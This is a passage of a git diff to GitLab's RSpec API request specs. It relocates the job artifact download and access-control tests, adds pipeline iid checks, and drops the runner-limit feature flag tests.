+ it_behaves_like 'not found' + end + + context 'has no such job' do + before do + get_for_ref(pipeline.ref, 'NOBUILD') + end + + it_behaves_like 'not found' + end + end + + context 'find proper job' do + let(:job_with_artifacts) { job } + + shared_examples 'a valid file' do + context 'when artifacts are stored locally', :sidekiq_might_not_need_inline do + let(:download_headers) do + { 'Content-Transfer-Encoding' => 'binary', + 'Content-Disposition' => + %Q(attachment; filename="#{job_with_artifacts.artifacts_file.filename}"; filename*=UTF-8''#{job.artifacts_file.filename}) } + end + + it { expect(response).to have_gitlab_http_status(:ok) } + it { expect(response.headers.to_h).to include(download_headers) } + end + + context 'when artifacts are stored remotely' do + let(:job) { create(:ci_build, pipeline: pipeline, user: api_user) } + let!(:artifact) { create(:ci_job_artifact, :archive, :remote_store, job: job) } + + before do + job.reload + + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + it 'returns location redirect' do + expect(response).to have_gitlab_http_status(:found) + end + end + end + + context 'with regular branch' do + before do + pipeline.reload + pipeline.update!(ref: 'master', + sha: project.commit('master').sha) + + get_for_ref('master') + end + + it_behaves_like 'a valid file' + end + + context 'with branch name containing slash' do + before do + pipeline.reload + pipeline.update!(ref: 'improve/awesome', sha: project.commit('improve/awesome').sha) + get_for_ref('improve/awesome') + end + + it_behaves_like 'a valid file' + end + + context 'with job name in a child pipeline' do + let(:child_pipeline) { create(:ci_pipeline, child_of: pipeline) } + let!(:child_job) { create(:ci_build, :artifacts, :success, name: 'rspec', pipeline: child_pipeline) } + let(:job_with_artifacts) { child_job } + + before do + get_for_ref('master', child_job.name) + end + + it_behaves_like 'a valid file' + end + end + end + + describe 'GET 
id/jobs/artifacts/:ref_name/raw/*artifact_path?job=name' do + context 'when job has artifacts' do + let(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } + let(:artifact) { 'other_artifacts_0.1.2/another-subdirectory/banana_sample.gif' } + let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } + let(:public_builds) { true } + + before do + stub_artifacts_object_storage + job.success + + project.update!(visibility_level: visibility_level, + public_builds: public_builds) + + get_artifact_file(artifact) + end + + context 'when user is anonymous' do + let(:api_user) { nil } + + context 'when project is public' do + let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } + let(:public_builds) { true } + + it 'allows to access artifacts', :sidekiq_might_not_need_inline do + expect(response).to have_gitlab_http_status(:ok) + expect(response.headers.to_h) + .to include('Content-Type' => 'application/json', + 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + end + end + + context 'when project is public with builds access disabled' do + let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } + let(:public_builds) { false } + + it 'rejects access to artifacts' do + expect(response).to have_gitlab_http_status(:forbidden) + expect(json_response).to have_key('message') + expect(response.headers.to_h) + .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + end + end + + context 'when project is public with non public artifacts' do + let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline, user: api_user) } + let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } + let(:public_builds) { true } + + it 'rejects access and hides existence of artifacts', :sidekiq_might_not_need_inline do + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:forbidden) + expect(json_response).to have_key('message') + expect(response.headers.to_h) + .not_to include('Gitlab-Workhorse-Send-Data' 
=> /artifacts-entry/) + end + + context 'with the non_public_artifacts feature flag disabled' do + before do + stub_feature_flags(non_public_artifacts: false) + end + + it 'allows access to artifacts', :sidekiq_might_not_need_inline do + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + end + end + end + + context 'when project is private' do + let(:visibility_level) { Gitlab::VisibilityLevel::PRIVATE } + let(:public_builds) { true } + + it 'rejects access and hides existence of artifacts' do + expect(response).to have_gitlab_http_status(:not_found) + expect(json_response).to have_key('message') + expect(response.headers.to_h) + .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + end + end + end + + context 'when user is authorized' do + let(:visibility_level) { Gitlab::VisibilityLevel::PRIVATE } + let(:public_builds) { true } + + it 'returns a specific artifact file for a valid path', :sidekiq_might_not_need_inline do + expect(Gitlab::Workhorse) + .to receive(:send_artifacts_entry) + .and_call_original + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + expect(response.headers.to_h) + .to include('Content-Type' => 'application/json', + 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + expect(response.parsed_body).to be_empty + end + end + + context 'with branch name containing slash' do + before do + pipeline.reload + pipeline.update!(ref: 'improve/awesome', + sha: project.commit('improve/awesome').sha) + end + + it 'returns a specific artifact file for a valid path', :sidekiq_might_not_need_inline do + get_artifact_file(artifact, 'improve/awesome') + + expect(response).to have_gitlab_http_status(:ok) + expect(response.headers.to_h) + .to include('Content-Type' => 'application/json', + 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + end + end + + context 'non-existing job' do + shared_examples 'not found' do + it { expect(response).to have_gitlab_http_status(:not_found) } 
+ end + + context 'has no such ref' do + before do + get_artifact_file('some/artifact', 'wrong-ref') + end + + it_behaves_like 'not found' + end + + context 'has no such job' do + before do + get_artifact_file('some/artifact', pipeline.ref, 'wrong-job-name') + end + + it_behaves_like 'not found' + end + end + end + + context 'when job does not have artifacts' do + let(:job) { create(:ci_build, pipeline: pipeline, user: api_user) } + + it 'does not return job artifact file' do + get_artifact_file('some/artifact') + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + def get_artifact_file(artifact_path, ref = pipeline.ref, job_name = job.name) + get api("/projects/#{project.id}/jobs/artifacts/#{ref}/raw/#{artifact_path}", api_user), params: { job: job_name } + end + end + + describe 'POST /projects/:id/jobs/:job_id/artifacts/keep' do + before do + post api("/projects/#{project.id}/jobs/#{job.id}/artifacts/keep", user) + end + + context 'artifacts did not expire' do + let(:job) do + create(:ci_build, :trace_artifact, :artifacts, :success, + project: project, pipeline: pipeline, artifacts_expire_at: Time.now + 7.days) + end + + it 'keeps artifacts' do + expect(response).to have_gitlab_http_status(:ok) + expect(job.reload.artifacts_expire_at).to be_nil + end + end + + context 'no artifacts' do + let(:job) { create(:ci_build, project: project, pipeline: pipeline) } + + it 'responds with not found' do + expect(response).to have_gitlab_http_status(:not_found) + end + end + end +end diff --git a/spec/requests/api/ci/jobs_spec.rb b/spec/requests/api/ci/jobs_spec.rb index 410020b68cd..7c85cbc31a5 100644 --- a/spec/requests/api/ci/jobs_spec.rb +++ b/spec/requests/api/ci/jobs_spec.rb @@ -428,584 +428,41 @@ RSpec.describe API::Ci::Jobs do end end - context 'when trace artifact record exists with no stored file', :skip_before_request do - before do - create(:ci_job_artifact, :unarchived_trace_artifact, job: job, project: job.project) - end - - it 'returns no 
artifacts nor trace data' do + context 'when job succeeded' do + it 'does not return failure_reason' do get api("/projects/#{project.id}/jobs/#{job.id}", api_user) - expect(response).to have_gitlab_http_status(:ok) - expect(json_response['artifacts']).to be_an Array - expect(json_response['artifacts'].size).to eq(1) - expect(json_response['artifacts'][0]['file_type']).to eq('trace') - expect(json_response['artifacts'][0]['filename']).to eq('job.log') - end - end - end - - describe 'DELETE /projects/:id/jobs/:job_id/artifacts' do - let!(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } - - before do - delete api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - context 'when user is anonymous' do - let(:api_user) { nil } - - it 'does not delete artifacts' do - expect(job.job_artifacts.size).to eq 2 - end - - it 'returns status 401 (unauthorized)' do - expect(response).to have_gitlab_http_status(:unauthorized) - end - end - - context 'with developer' do - it 'does not delete artifacts' do - expect(job.job_artifacts.size).to eq 2 - end - - it 'returns status 403 (forbidden)' do - expect(response).to have_gitlab_http_status(:forbidden) - end - end - - context 'with authorized user' do - let(:maintainer) { create(:project_member, :maintainer, project: project).user } - let!(:api_user) { maintainer } - - it 'deletes artifacts' do - expect(job.job_artifacts.size).to eq 0 - end - - it 'returns status 204 (no content)' do - expect(response).to have_gitlab_http_status(:no_content) + expect(json_response).not_to include('failure_reason') end end - end - - describe 'GET /projects/:id/jobs/:job_id/artifacts/:artifact_path' do - context 'when job has artifacts' do - let(:job) { create(:ci_build, :artifacts, pipeline: pipeline) } - - let(:artifact) do - 'other_artifacts_0.1.2/another-subdirectory/banana_sample.gif' - end - - context 'when user is anonymous' do - let(:api_user) { nil } - - context 'when project is public' do - it 
'allows to access artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, true) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - end - end - - context 'when project is public with artifacts that are non public' do - let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline) } - - it 'rejects access to artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, true) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:forbidden) - end - - context 'with the non_public_artifacts feature flag disabled' do - before do - stub_feature_flags(non_public_artifacts: false) - end - - it 'allows access to artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, true) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - end - end - end - - context 'when project is public with builds access disabled' do - it 'rejects access to artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, false) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:forbidden) - end - end - - context 'when project is private' do - it 'rejects access and hides existence of artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PRIVATE) - project.update_column(:public_builds, true) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - context 'when user is authorized' do - it 'returns a specific artifact file for a valid path' do - expect(Gitlab::Workhorse) - .to receive(:send_artifacts_entry) - .and_call_original - - get_artifact_file(artifact) - - expect(response).to 
have_gitlab_http_status(:ok) - expect(response.headers.to_h) - .to include('Content-Type' => 'application/json', - 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - expect(response.parsed_body).to be_empty - end - - context 'when artifacts are locked' do - it 'allows access to expired artifact' do - pipeline.artifacts_locked! - job.update!(artifacts_expire_at: Time.now - 7.days) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - end - end - end - end - - context 'when job does not have artifacts' do - it 'does not return job artifact file' do - get_artifact_file('some/artifact') - - expect(response).to have_gitlab_http_status(:not_found) - end - end - - def get_artifact_file(artifact_path) - get api("/projects/#{project.id}/jobs/#{job.id}/" \ - "artifacts/#{artifact_path}", api_user) - end - end - - describe 'GET /projects/:id/jobs/:job_id/artifacts' do - shared_examples 'downloads artifact' do - let(:download_headers) do - { 'Content-Transfer-Encoding' => 'binary', - 'Content-Disposition' => %q(attachment; filename="ci_build_artifacts.zip"; filename*=UTF-8''ci_build_artifacts.zip) } - end - - it 'returns specific job artifacts' do - expect(response).to have_gitlab_http_status(:ok) - expect(response.headers.to_h).to include(download_headers) - expect(response.body).to match_file(job.artifacts_file.file.file) - end - end - - context 'normal authentication' do - context 'job with artifacts' do - context 'when artifacts are stored locally' do - let(:job) { create(:ci_build, :artifacts, pipeline: pipeline) } - - before do - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - context 'authorized user' do - it_behaves_like 'downloads artifact' - end - - context 'unauthorized user' do - let(:api_user) { nil } - - it 'does not return specific job artifacts' do - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - - context 'when artifacts are stored remotely' do - 
let(:proxy_download) { false } - let(:job) { create(:ci_build, pipeline: pipeline) } - let(:artifact) { create(:ci_job_artifact, :archive, :remote_store, job: job) } - - before do - stub_artifacts_object_storage(proxy_download: proxy_download) - - artifact - job.reload - - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - context 'when proxy download is enabled' do - let(:proxy_download) { true } - - it 'responds with the workhorse send-url' do - expect(response.headers[Gitlab::Workhorse::SEND_DATA_HEADER]).to start_with("send-url:") - end - end - - context 'when proxy download is disabled' do - it 'returns location redirect' do - expect(response).to have_gitlab_http_status(:found) - end - end - - context 'authorized user' do - it 'returns the file remote URL' do - expect(response).to redirect_to(artifact.file.url) - end - end - - context 'unauthorized user' do - let(:api_user) { nil } - - it 'does not return specific job artifacts' do - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - - context 'when public project guest and artifacts are non public' do - let(:api_user) { guest } - let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline) } - - before do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, true) - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - it 'rejects access and hides existence of artifacts' do - expect(response).to have_gitlab_http_status(:forbidden) - end - - context 'with the non_public_artifacts feature flag disabled' do - before do - stub_feature_flags(non_public_artifacts: false) - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - it 'allows access to artifacts' do - expect(response).to have_gitlab_http_status(:ok) - end - end - end - - it 'does not return job artifacts if not uploaded' do - get 
api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - end - - describe 'GET /projects/:id/artifacts/:ref_name/download?job=name' do - let(:api_user) { reporter } - let(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } - - before do - stub_artifacts_object_storage - job.success - end - - def get_for_ref(ref = pipeline.ref, job_name = job.name) - get api("/projects/#{project.id}/jobs/artifacts/#{ref}/download", api_user), params: { job: job_name } - end - - context 'when not logged in' do - let(:api_user) { nil } - - before do - get_for_ref - end - - it 'does not find a resource in a private project' do - expect(project).to be_private - expect(response).to have_gitlab_http_status(:not_found) - end - end - - context 'when logging as guest' do - let(:api_user) { guest } - - before do - get_for_ref - end - - it 'gives 403' do - expect(response).to have_gitlab_http_status(:forbidden) - end - end - - context 'non-existing job' do - shared_examples 'not found' do - it { expect(response).to have_gitlab_http_status(:not_found) } - end - - context 'has no such ref' do - before do - get_for_ref('TAIL') - end - - it_behaves_like 'not found' - end - - context 'has no such job' do - before do - get_for_ref(pipeline.ref, 'NOBUILD') - end - - it_behaves_like 'not found' - end - end - - context 'find proper job' do - let(:job_with_artifacts) { job } - - shared_examples 'a valid file' do - context 'when artifacts are stored locally', :sidekiq_might_not_need_inline do - let(:download_headers) do - { 'Content-Transfer-Encoding' => 'binary', - 'Content-Disposition' => - %Q(attachment; filename="#{job_with_artifacts.artifacts_file.filename}"; filename*=UTF-8''#{job.artifacts_file.filename}) } - end - - it { expect(response).to have_gitlab_http_status(:ok) } - it { expect(response.headers.to_h).to include(download_headers) } - end - - context 'when artifacts are stored 
remotely' do - let(:job) { create(:ci_build, pipeline: pipeline, user: api_user) } - let!(:artifact) { create(:ci_job_artifact, :archive, :remote_store, job: job) } - - before do - job.reload - - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - it 'returns location redirect' do - expect(response).to have_gitlab_http_status(:found) - end - end - end - - context 'with regular branch' do - before do - pipeline.reload - pipeline.update!(ref: 'master', - sha: project.commit('master').sha) - - get_for_ref('master') - end - - it_behaves_like 'a valid file' - end - - context 'with branch name containing slash' do - before do - pipeline.reload - pipeline.update!(ref: 'improve/awesome', sha: project.commit('improve/awesome').sha) - get_for_ref('improve/awesome') - end - - it_behaves_like 'a valid file' + context 'when job failed' do + let(:job) do + create(:ci_build, :failed, :tags, pipeline: pipeline) end - context 'with job name in a child pipeline' do - let(:child_pipeline) { create(:ci_pipeline, child_of: pipeline) } - let!(:child_job) { create(:ci_build, :artifacts, :success, name: 'rspec', pipeline: child_pipeline) } - let(:job_with_artifacts) { child_job } - - before do - get_for_ref('master', child_job.name) - end + it 'returns failure_reason' do + get api("/projects/#{project.id}/jobs/#{job.id}", api_user) - it_behaves_like 'a valid file' + expect(json_response).to include('failure_reason') end end - end - - describe 'GET id/jobs/artifacts/:ref_name/raw/*artifact_path?job=name' do - context 'when job has artifacts' do - let(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } - let(:artifact) { 'other_artifacts_0.1.2/another-subdirectory/banana_sample.gif' } - let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } - let(:public_builds) { true } + context 'when trace artifact record exists with no stored file', :skip_before_request do before do - stub_artifacts_object_storage - job.success - - 
project.update!(visibility_level: visibility_level, - public_builds: public_builds) - - get_artifact_file(artifact) - end - - context 'when user is anonymous' do - let(:api_user) { nil } - - context 'when project is public' do - let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } - let(:public_builds) { true } - - it 'allows to access artifacts', :sidekiq_might_not_need_inline do - expect(response).to have_gitlab_http_status(:ok) - expect(response.headers.to_h) - .to include('Content-Type' => 'application/json', - 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - end - - context 'when project is public with builds access disabled' do - let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } - let(:public_builds) { false } - - it 'rejects access to artifacts' do - expect(response).to have_gitlab_http_status(:forbidden) - expect(json_response).to have_key('message') - expect(response.headers.to_h) - .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - end - - context 'when project is public with non public artifacts' do - let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline, user: api_user) } - let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } - let(:public_builds) { true } - - it 'rejects access and hides existence of artifacts', :sidekiq_might_not_need_inline do - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:forbidden) - expect(json_response).to have_key('message') - expect(response.headers.to_h) - .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - - context 'with the non_public_artifacts feature flag disabled' do - before do - stub_feature_flags(non_public_artifacts: false) - end - - it 'allows access to artifacts', :sidekiq_might_not_need_inline do - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - end - end - end - - context 'when project is private' do - let(:visibility_level) { 
Gitlab::VisibilityLevel::PRIVATE } - let(:public_builds) { true } - - it 'rejects access and hides existence of artifacts' do - expect(response).to have_gitlab_http_status(:not_found) - expect(json_response).to have_key('message') - expect(response.headers.to_h) - .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - end - end - - context 'when user is authorized' do - let(:visibility_level) { Gitlab::VisibilityLevel::PRIVATE } - let(:public_builds) { true } - - it 'returns a specific artifact file for a valid path', :sidekiq_might_not_need_inline do - expect(Gitlab::Workhorse) - .to receive(:send_artifacts_entry) - .and_call_original - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - expect(response.headers.to_h) - .to include('Content-Type' => 'application/json', - 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - expect(response.parsed_body).to be_empty - end - end - - context 'with branch name containing slash' do - before do - pipeline.reload - pipeline.update!(ref: 'improve/awesome', - sha: project.commit('improve/awesome').sha) - end - - it 'returns a specific artifact file for a valid path', :sidekiq_might_not_need_inline do - get_artifact_file(artifact, 'improve/awesome') - - expect(response).to have_gitlab_http_status(:ok) - expect(response.headers.to_h) - .to include('Content-Type' => 'application/json', - 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - end - - context 'non-existing job' do - shared_examples 'not found' do - it { expect(response).to have_gitlab_http_status(:not_found) } - end - - context 'has no such ref' do - before do - get_artifact_file('some/artifact', 'wrong-ref') - end - - it_behaves_like 'not found' - end - - context 'has no such job' do - before do - get_artifact_file('some/artifact', pipeline.ref, 'wrong-job-name') - end - - it_behaves_like 'not found' - end + create(:ci_job_artifact, :unarchived_trace_artifact, job: job, project: job.project) end - end - 
context 'when job does not have artifacts' do - let(:job) { create(:ci_build, pipeline: pipeline, user: api_user) } - - it 'does not return job artifact file' do - get_artifact_file('some/artifact') + it 'returns no artifacts nor trace data' do + get api("/projects/#{project.id}/jobs/#{job.id}", api_user) - expect(response).to have_gitlab_http_status(:not_found) + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['artifacts']).to be_an Array + expect(json_response['artifacts'].size).to eq(1) + expect(json_response['artifacts'][0]['file_type']).to eq('trace') + expect(json_response['artifacts'][0]['filename']).to eq('job.log') end end - - def get_artifact_file(artifact_path, ref = pipeline.ref, job_name = job.name) - get api("/projects/#{project.id}/jobs/artifacts/#{ref}/raw/#{artifact_path}", api_user), params: { job: job_name } - end end describe 'GET /projects/:id/jobs/:job_id/trace' do @@ -1249,32 +706,6 @@ RSpec.describe API::Ci::Jobs do end end - describe 'POST /projects/:id/jobs/:job_id/artifacts/keep' do - before do - post api("/projects/#{project.id}/jobs/#{job.id}/artifacts/keep", user) - end - - context 'artifacts did not expire' do - let(:job) do - create(:ci_build, :trace_artifact, :artifacts, :success, - project: project, pipeline: pipeline, artifacts_expire_at: Time.now + 7.days) - end - - it 'keeps artifacts' do - expect(response).to have_gitlab_http_status(:ok) - expect(job.reload.artifacts_expire_at).to be_nil - end - end - - context 'no artifacts' do - let(:job) { create(:ci_build, project: project, pipeline: pipeline) } - - it 'responds with not found' do - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - describe 'POST /projects/:id/jobs/:job_id/play' do before do post api("/projects/#{project.id}/jobs/#{job.id}/play", api_user) diff --git a/spec/requests/api/ci/pipelines_spec.rb b/spec/requests/api/ci/pipelines_spec.rb index 7ae350885f4..13838cffd76 100644 --- 
a/spec/requests/api/ci/pipelines_spec.rb +++ b/spec/requests/api/ci/pipelines_spec.rb @@ -33,6 +33,7 @@ RSpec.describe API::Ci::Pipelines do expect(json_response).to be_an Array expect(json_response.first['sha']).to match(/\A\h{40}\z/) expect(json_response.first['id']).to eq pipeline.id + expect(json_response.first['iid']).to eq pipeline.iid expect(json_response.first['web_url']).to be_present end @@ -40,7 +41,7 @@ RSpec.describe API::Ci::Pipelines do it 'includes pipeline source' do get api("/projects/#{project.id}/pipelines", user) - expect(json_response.first.keys).to contain_exactly(*%w[id project_id sha ref status web_url created_at updated_at source]) + expect(json_response.first.keys).to contain_exactly(*%w[id iid project_id sha ref status web_url created_at updated_at source]) end end @@ -840,7 +841,7 @@ RSpec.describe API::Ci::Pipelines do it 'exposes the coverage' do get api("/projects/#{project.id}/pipelines/#{pipeline.id}", user) - expect(json_response["coverage"].to_i).to eq(30) + expect(json_response["coverage"]).to eq('30.00') end end end diff --git a/spec/requests/api/ci/runner/jobs_artifacts_spec.rb b/spec/requests/api/ci/runner/jobs_artifacts_spec.rb index 195aac2e5f0..f627f207d98 100644 --- a/spec/requests/api/ci/runner/jobs_artifacts_spec.rb +++ b/spec/requests/api/ci/runner/jobs_artifacts_spec.rb @@ -131,8 +131,8 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do let(:send_request) { subject } end - it 'updates runner info' do - expect { subject }.to change { runner.reload.contacted_at } + it "doesn't update runner info" do + expect { subject }.not_to change { runner.reload.contacted_at } end shared_examples 'authorizes local file' do @@ -280,8 +280,8 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do end end - it 'updates runner info' do - expect { upload_artifacts(file_upload, headers_with_token) }.to change { runner.reload.contacted_at } + it "doesn't update runner info" do + expect { 
upload_artifacts(file_upload, headers_with_token) }.not_to change { runner.reload.contacted_at } end context 'when the artifact is too large' do @@ -812,8 +812,8 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do let(:send_request) { download_artifact } end - it 'updates runner info' do - expect { download_artifact }.to change { runner.reload.contacted_at } + it "doesn't update runner info" do + expect { download_artifact }.not_to change { runner.reload.contacted_at } end context 'when job has artifacts' do diff --git a/spec/requests/api/ci/runner/jobs_request_post_spec.rb b/spec/requests/api/ci/runner/jobs_request_post_spec.rb index fdf1a278d4c..68f7581bf06 100644 --- a/spec/requests/api/ci/runner/jobs_request_post_spec.rb +++ b/spec/requests/api/ci/runner/jobs_request_post_spec.rb @@ -833,8 +833,8 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do let(:expected_params) { { project: project.full_path, client_id: "runner/#{runner.id}" } } end - it_behaves_like 'not executing any extra queries for the application context', 2 do - # Extra queries: Project, Route + it_behaves_like 'not executing any extra queries for the application context', 3 do + # Extra queries: Project, Route, RunnerProject let(:subject_proc) { proc { request_job } } end end diff --git a/spec/requests/api/ci/runner/runners_post_spec.rb b/spec/requests/api/ci/runner/runners_post_spec.rb index b3a7d591c93..a51d8b458f8 100644 --- a/spec/requests/api/ci/runner/runners_post_spec.rb +++ b/spec/requests/api/ci/runner/runners_post_spec.rb @@ -98,33 +98,14 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do before do create(:ci_runner, runner_type: :project_type, projects: [project], contacted_at: 1.second.ago) create(:plan_limits, :default_plan, ci_registered_project_runners: 1) - - skip_default_enabled_yaml_check - stub_feature_flags(ci_runner_limits_override: ci_runner_limits_override) - end - - context 'with ci_runner_limits_override FF 
disabled' do - let(:ci_runner_limits_override) { false } - - it 'does not create runner' do - request - - expect(response).to have_gitlab_http_status(:bad_request) - expect(json_response['message']).to include('runner_projects.base' => ['Maximum number of ci registered project runners (1) exceeded']) - expect(project.runners.reload.size).to eq(1) - end end - context 'with ci_runner_limits_override FF enabled' do - let(:ci_runner_limits_override) { true } - - it 'creates runner' do - request + it 'does not create runner' do + request - expect(response).to have_gitlab_http_status(:created) - expect(json_response['message']).to be_nil - expect(project.runners.reload.size).to eq(2) - end + expect(response).to have_gitlab_http_status(:bad_request) + expect(json_response['message']).to include('runner_projects.base' => ['Maximum number of ci registered project runners (1) exceeded']) + expect(project.runners.reload.size).to eq(1) end end @@ -132,9 +113,6 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do before do create(:ci_runner, runner_type: :project_type, projects: [project], created_at: 14.months.ago, contacted_at: 13.months.ago) create(:plan_limits, :default_plan, ci_registered_project_runners: 1) - - skip_default_enabled_yaml_check - stub_feature_flags(ci_runner_limits_override: false) end it 'creates runner' do @@ -204,33 +182,14 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do before do create(:ci_runner, runner_type: :group_type, groups: [group], contacted_at: nil, created_at: 1.month.ago) create(:plan_limits, :default_plan, ci_registered_group_runners: 1) - - skip_default_enabled_yaml_check - stub_feature_flags(ci_runner_limits_override: ci_runner_limits_override) - end - - context 'with ci_runner_limits_override FF disabled' do - let(:ci_runner_limits_override) { false } - - it 'does not create runner' do - request - - expect(response).to have_gitlab_http_status(:bad_request) - expect(json_response['message']).to 
include('runner_namespaces.base' => ['Maximum number of ci registered group runners (1) exceeded']) - expect(group.runners.reload.size).to eq(1) - end end - context 'with ci_runner_limits_override FF enabled' do - let(:ci_runner_limits_override) { true } - - it 'creates runner' do - request + it 'does not create runner' do + request - expect(response).to have_gitlab_http_status(:created) - expect(json_response['message']).to be_nil - expect(group.runners.reload.size).to eq(2) - end + expect(response).to have_gitlab_http_status(:bad_request) + expect(json_response['message']).to include('runner_namespaces.base' => ['Maximum number of ci registered group runners (1) exceeded']) + expect(group.runners.reload.size).to eq(1) end end @@ -239,9 +198,6 @@ RSpec.describe API::Ci::Runner, :clean_gitlab_redis_shared_state do create(:ci_runner, runner_type: :group_type, groups: [group], created_at: 4.months.ago, contacted_at: 3.months.ago) create(:ci_runner, runner_type: :group_type, groups: [group], contacted_at: nil, created_at: 4.months.ago) create(:plan_limits, :default_plan, ci_registered_group_runners: 1) - - skip_default_enabled_yaml_check - stub_feature_flags(ci_runner_limits_override: false) end it 'creates runner' do diff --git a/spec/requests/api/ci/runners_spec.rb b/spec/requests/api/ci/runners_spec.rb index 6879dfc9572..6ca380a3cb9 100644 --- a/spec/requests/api/ci/runners_spec.rb +++ b/spec/requests/api/ci/runners_spec.rb @@ -254,6 +254,7 @@ RSpec.describe API::Ci::Runners do expect(response).to have_gitlab_http_status(:ok) expect(json_response['description']).to eq(shared_runner.description) expect(json_response['maximum_timeout']).to be_nil + expect(json_response['status']).to eq("not_connected") end end @@ -1101,31 +1102,13 @@ RSpec.describe API::Ci::Runners do context 'when it exceeds the application limits' do before do create(:plan_limits, :default_plan, ci_registered_project_runners: 1) - - skip_default_enabled_yaml_check - 
stub_feature_flags(ci_runner_limits_override: ci_runner_limits_override) end - context 'with ci_runner_limits_override FF disabled' do - let(:ci_runner_limits_override) { false } - - it 'does not enable specific runner' do - expect do - post api("/projects/#{project.id}/runners", admin), params: { runner_id: new_project_runner.id } - end.not_to change { project.runners.count } - expect(response).to have_gitlab_http_status(:bad_request) - end - end - - context 'with ci_runner_limits_override FF enabled' do - let(:ci_runner_limits_override) { true } - - it 'enables specific runner' do - expect do - post api("/projects/#{project.id}/runners", admin), params: { runner_id: new_project_runner.id } - end.to change { project.runners.count } - expect(response).to have_gitlab_http_status(:created) - end + it 'does not enable specific runner' do + expect do + post api("/projects/#{project.id}/runners", admin), params: { runner_id: new_project_runner.id } + end.not_to change { project.runners.count } + expect(response).to have_gitlab_http_status(:bad_request) end end end diff --git a/spec/requests/api/commit_statuses_spec.rb b/spec/requests/api/commit_statuses_spec.rb index 47bc3eb74a6..39be28d7427 100644 --- a/spec/requests/api/commit_statuses_spec.rb +++ b/spec/requests/api/commit_statuses_spec.rb @@ -14,8 +14,19 @@ RSpec.describe API::CommitStatuses do let(:get_url) { "/projects/#{project.id}/repository/commits/#{sha}/statuses" } context 'ci commit exists' do - let!(:master) { project.ci_pipelines.create!(source: :push, sha: commit.id, ref: 'master', protected: false) } - let!(:develop) { project.ci_pipelines.create!(source: :push, sha: commit.id, ref: 'develop', protected: false) } + let!(:master) do + project.ci_pipelines.build(source: :push, sha: commit.id, ref: 'master', protected: false).tap do |p| + p.ensure_project_iid! # Necessary to avoid cross-database modification error + p.save! 
